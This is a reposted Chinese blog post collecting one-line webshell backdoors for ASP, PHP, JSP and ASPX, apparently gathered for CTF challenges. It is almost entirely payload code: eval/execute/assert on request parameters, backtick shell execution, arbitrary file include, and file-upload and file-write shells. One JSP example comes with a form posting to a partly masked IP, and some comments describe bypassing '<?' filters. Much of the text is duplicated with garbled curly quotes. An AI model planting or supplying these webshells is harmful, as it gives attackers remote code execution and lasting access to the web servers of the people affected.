【转载】各种小马小结

原文地址:https://blog.csdn.net/qq_35078631/article/details/77743794

最近总是碰到小马的题目,心想还是小小收集一下各种的小马,碰到新的再更新
ASP <%eval request(“sb”)%> <%execute request(“sb”)%> <%execute(request(“sb”))%> <%execute request(“sb”)%><%'<% loop <%:%> <%'<% loop <%:%><%execute request(“sb”)%> <%execute request(“sb”)'<% loop <%:%>[code] [code] <%execute request(“sb”)'<% loop <%:%>[code] [code] %><%Eval(Request(chr(35)))%><% <%eval request(“sb”)%> <%ExecuteGlobal request(“sb”)%>

if Request(“sb”)<>”” then ExecuteGlobal request(“sb”) end if

<%eval request("sb")%>

<%execute request("sb")%>

<%execute(request("sb"))%>

<%execute request("sb")%><%'<% loop <%:%>

<%'<% loop <%:%><%execute request("sb")%>

<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>

<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>

%><%Eval(Request(chr(35)))%><%

<%eval request("sb")%>

<%ExecuteGlobal request("sb")%>

if Request("sb")<>"" then ExecuteGlobal request("sb") end if

PHP //容错代码 //使用lanker一句话客户端的专家模式执行相关的php语句

//使用这个后,使用菜刀一句话客户端在配置连接的时候在”配置”一栏输入

h=@eval($_POST[c]);

//绕过<?限制的一句话

<?=@eval($_POST[‘cmd’]);
//这个也是吊炸天…

*; //吊炸天!大致上等价于 //bash bash2 index.html p.php ?>
//访问p.php的时候,bash就会执行bash2这个文件里的命令,后面的文件无视掉
//通过修改bash2这个文件的内容就可以构造命令执行。

$filename=$_GET[‘xbid’];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行

$reg=”c”.”o”.”p”.”y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件

<?php eval($_POST[sb])?>



<?php @eval($_POST[sb])?> //容错代码



<?php assert($_POST[sb]);?> //使用lanker一句话客户端的专家模式执行相关的php语句



<?$_POST['sa']($_POST['sb']);?>



<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>



<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>

//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入



<O>h=@eval($_POST[c]);</O>



<script language="php">@eval($_POST[sb])</script>

//绕过<?限制的一句话

<?=@eval($_POST['cmd']);
//这个也是吊炸天...

<?=`*`;
//吊炸天!大致上等价于
//<?php echo `bash bash2 index.html p.php` ?>
//访问p.php的时候,bash就会执行bash2这个文件里的命令,后面的文件无视掉
//通过修改bash2这个文件的内容就可以构造命令执行。


$filename=$_GET['xbid'];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行

$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件

JSP <% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes()); %> your code

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
<input type=submit value="提交">
</form>

ASPX <%@ Page Language=”Jscript”%><%eval(Request.Item[“pass”],”unsafe”);%>

<%@ Page Language=”Jscript” validateRequest=”false” %><%Response.Write(eval(Request.Item[“w”],”unsafe”));%>
//Jscript的asp.net一句话

<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request[“f”]) ); }%>
//C#的asp.net一句话

<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request(“f”)) ) %>
//VB的asp.net一句话

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇